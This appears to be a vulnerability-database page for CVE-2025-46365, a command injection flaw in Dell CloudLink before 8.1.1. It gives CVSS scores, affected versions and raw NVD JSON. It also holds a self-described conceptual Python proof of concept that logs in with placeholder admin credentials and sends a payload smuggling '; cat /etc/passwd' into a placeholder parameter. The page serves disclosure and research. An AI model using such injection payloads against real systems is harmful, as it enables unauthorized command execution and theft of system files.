Security Vulnerability Report
中文
CVE-2025-46365 CVSS 5.3 MEDIUM

CVE-2025-46365

Published: 2025-11-05 17:15:42
Last Modified: 2025-11-07 17:59:02

Description

Dell CloudLink, versions prior 8.1.1, contain a Command Injection vulnerability which can be exploited by an Authenticated attacker to cause Command Injection on an affected Dell CloudLink.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:* - VULNERABLE
Dell CloudLink < 8.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46365 PoC - Dell CloudLink Command Injection # Note: This is a conceptual PoC for authorized security testing only import requests import json TARGET = "https://target-dell-cloudlink.local" LOGIN_URL = f"{TARGET}/api/auth/login" INJECT_URL = f"{TARGET}/api/vulnerable/endpoint" # Authentication with high-privilege account credentials = { "username": "admin", "password": "password123" } session = requests.Session() login_response = session.post(LOGIN_URL, json=credentials) if login_response.status_code == 200: token = login_response.json().get('token') headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Command injection payload # In real scenario, identify the vulnerable parameter payload = { "parameter": "; cat /etc/passwd > /tmp/pwned.txt; echo test", "action": "execute" } # Send exploit request response = session.post(INJECT_URL, json=payload, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}") else: print("Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46365", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:42.067", "lastModified": "2025-11-07T17:59:01.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudLink, versions prior 8.1.1, contain a Command Injection vulnerability which can be exploited by an Authenticated attacker to cause Command Injection on an affected Dell CloudLink."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.1.1", "matchCriteriaId": "34EF297E-AA7C-41F5-B0DA-E6105A6B4207"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}